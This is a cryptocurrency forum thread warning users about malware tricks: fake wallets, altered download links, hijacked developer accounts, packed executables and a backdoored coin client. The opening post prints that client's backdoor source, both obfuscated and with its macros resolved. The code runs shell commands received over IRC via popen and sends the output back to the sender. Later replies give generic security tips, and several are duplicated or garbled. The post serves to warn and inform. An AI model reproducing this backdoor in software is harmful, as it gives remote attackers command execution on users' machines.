Beware of Increasingly Sophisticated Malware Infection Attempts

[Miha Kot]

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:

Code:

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
	CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		CFree(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
	}
}

here is the source code with macros resolved:

Code:

if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
	FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		pclose(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
	}
}

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

What security system to do to avoid falling into the trap of cybercriminals and how to understand that it is cybercriminals ?

[1714901646]

1714901646

[diego ramos]

Tell me, is it so MAC OS is not protected from such attempts to harm? It seemed to me that Apple's products are quite protected

[dablatair]

I'm quite impressed by the power and imagination of hackers to find the weakness and explote it everywhere !

finally you never know if you are 100% safe or not.

Just be carefull as much as possible

[iSparta]

a year ago, my email was hacked. After that, the coins were withdrawn from the exchange .  It cost about 3,5k$. 2 FA has not been installed. Gmail mail return failed. Many contacts are missing

It is better to have special e-mail for exchange with 2FA enabled and special smartphone with Google application. You don’t have to use this e-mail and smartphone for any other purposes.

[cryptohorizons]

I've seen some ads on FB and Google that takes you to a page that installs mining scripts too...

[Ethan101]

Now a days a lot of phishing and malware infected hacking attempts are happening due to bad guys
who want to steel your personal information specially private keys. Block chain technology is a good
technology but still it has a lot of problems that need to be addressed. I want in every cryptocurrency
wallet there should be double factor authentication key that work with Google authenticator.

[Proba001]

double authentication is the best thing you can think of !!!
I agree to the whole 100%

[fsn]

Always beware of increased sophisticated malware infection attempts and just believe.

[edsnowangel]

correct me if im wrong but maleware its generecly for executables in windows no? i mean the wallets are but its not kaspersky enough?
if not why do we need to protect from the case of reteiving passorws from the users and other stuff from enven pen drives with wallets (including the common coins ones) like doge ltc btc and a few more.

yes most of the malware are executable files in windows operating system but this doesn't mean that malware can't affect other operating system such as MAC and Linux Distro there are other malware and viruses that can also penetrate other operating OS the key is to make sure that we will not easily fall to the trap of this people who are taking advantage of newbies. 

[Birenda23]

I hope to have a healthy community and warn the coin to show signs of scam

[meerkatoken]

correct me if im wrong but maleware its generecly for executables in windows no? i mean the wallets are but its not kaspersky enough?
if not why do we need to protect from the case of reteiving passorws from the users and other stuff from enven pen drives with wallets (including the common coins ones) like doge ltc btc and a few more.

yes most of the malware are executable files in windows operating system but this doesn't mean that malware can't affect other operating system such as MAC and Linux Distro there are other malware and viruses that can also penetrate other operating OS the key is to make sure that we will not easily fall to the trap of this people who are taking advantage of newbies. 

I believe the best you can do is to install the latest malwarebytes. It is available for Win, Mac and Linux as well.

[coincentrado]

Thanks for the warning!

[userclix]

Thank you for identifying these issues and providing useful tips and solutions to avoid being scammed. The crypto currency sphere needs this type of vigilance to attract more users in the future. It is really helpful. Much appreciated!

[cryptohelp2]

It's extremely important to be updated about security vulnerables these days.

[Phuc1411]

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money. this is very helpful. am very carefree while on the net. but with this information i will be more cautious

[DeathCrash]

The software of hackers is improved every hour with this you can not argue, so as not to become a victim of a hacker, observe simple rules.
1. Update the antivirus in time
2. Enable Auto-update of the system and all important programs (Browsers, Java script, etc.)
3. Buy a good router
4. Or as an option to use for Linux wallets

[edsnowangel]

The software of hackers is improved every hour with this you can not argue, so as not to become a victim of a hacker, observe simple rules.
1. Update the antivirus in time
2. Enable Auto-update of the system and all important programs (Browsers, Java script, etc.)
3. Buy a good router
4. Or as an option to use for Linux wallets

Great suggestion linux wallet and linux os is great but there are othee attacks like spoofings to inject malware in the users machine to avoid getting hack I will add make aure you are connected to a secure DnS servers  this will also add a little security in you machine.

[Pomualdo]

I thought that it should not bother me. But it turned out that my device is participating in mining, and I did not even suspect it. Be more careful.

[NeelMariaWarner]

The software of hackers is improved every hour with this you can not argue, so as not to become a victim of a hacker, observe simple rules.
1. Update the antivirus in time
2. Enable Auto-update of the system and all important programs (Browsers, Java script, etc.)
3. Buy a good router
4. Or as an option to use for Linux wallets

good advice sir,really usefull for me myself because my computer has been hacked long time ago. so for now i can anticipated for the safety of my laptop. thanks sir

[Pojumek]

remedy me if im wrong yet maleware its generecly for executables in windows no? I mean the wallets are nevertheless its not kaspersky enough?

if not for what reason do we have to shield from the instance of reteiving passorws from the clients and other stuff from enven pen drives with wallets (counting the regular coins ones) like doge ltc btc and a couple of something beyond.